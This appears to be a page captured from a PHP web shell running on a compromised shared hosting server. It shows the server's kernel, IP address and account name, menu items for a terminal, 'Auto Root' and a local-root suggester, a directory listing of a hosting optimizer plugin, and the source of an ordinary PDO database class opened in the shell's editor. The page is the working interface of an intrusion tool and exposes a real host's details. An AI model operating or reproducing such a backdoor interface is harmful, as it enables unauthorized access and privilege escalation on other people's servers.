Linux server.edchosting.com 4.18.0-553.79.1.lve.el7h.x86_64 #1 SMP Wed Oct 15 16:34:46 UTC 2025 x86_64
LiteSpeed
Server IP : 75.98.162.185 & Your IP : 216.73.216.163
Domains :
Cant Read [ /etc/named.conf ]
User : goons4good
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
a2-optimized /
app /
classes /
Delete
Unzip
Name
Size
Permission
Date
Action
class.A2OptAction.php
16.53
KB
-rw-r--r--
2025-04-29 15:40
class.A2OptBase.php
34.32
KB
-rw-r--r--
2025-04-29 15:40
class.A2OptDrupal.php
27.68
KB
-rw-r--r--
2025-04-29 15:40
class.A2OptDrupal8.php
23.09
KB
-rw-r--r--
2025-04-29 15:40
class.A2OptJoomla.php
28.43
KB
-rw-r--r--
2025-04-29 15:40
class.A2OptJoomla25.php
178
B
-rw-r--r--
2025-04-29 15:40
class.A2OptJoomla3.php
182
B
-rw-r--r--
2025-04-29 15:40
class.A2OptMagento.php
16.07
KB
-rw-r--r--
2025-04-29 15:40
class.A2OptMemcache.php
7.77
KB
-rw-r--r--
2025-04-29 15:40
class.A2OptOpenCart.php
25.74
KB
-rw-r--r--
2025-04-29 15:40
class.A2OptPDO.php
683
B
-rw-r--r--
2025-04-29 15:40
class.A2OptPrestaShop.php
21.11
KB
-rw-r--r--
2025-04-29 15:40
class.A2OptStaging.php
1.87
KB
-rw-r--r--
2025-04-29 15:40
class.A2OptTest.php
5.06
KB
-rw-r--r--
2025-04-29 15:40
class.A2OptTurboCache.php
14.24
KB
-rw-r--r--
2025-04-29 15:40
class.A2OptWordPress.php
48.93
KB
-rw-r--r--
2025-04-29 15:40
class.A2Optimize.php
5.25
KB
-rw-r--r--
2025-04-29 15:40
class.MemcacheLite.php
5.22
KB
-rw-r--r--
2025-04-29 15:40
class.MemcachedInstance.php
3.82
KB
-rw-r--r--
2025-04-29 15:40
Save
Rename
<?php class A2OptPDO extends PDO { public $engine; public $host; public $database; public $user; public $pass; public function __construct($host, $user, $pass, $db_name) { $this->engine = 'mysql'; $this->host = $host; $this->database = $db_name; $this->user = $user; $this->pass = $pass; if (!empty($this->host) && !empty($this->database) && !empty($this->user) && !empty($this->pass)) { $dns = "{$this->engine}:dbname={$this->database};host={$this->host}"; try { parent::__construct($dns, $this->user, $this->pass); } catch (PDOException $exception) { throw $exception; } } else { throw new PDOException('Missing parameters.'); } } }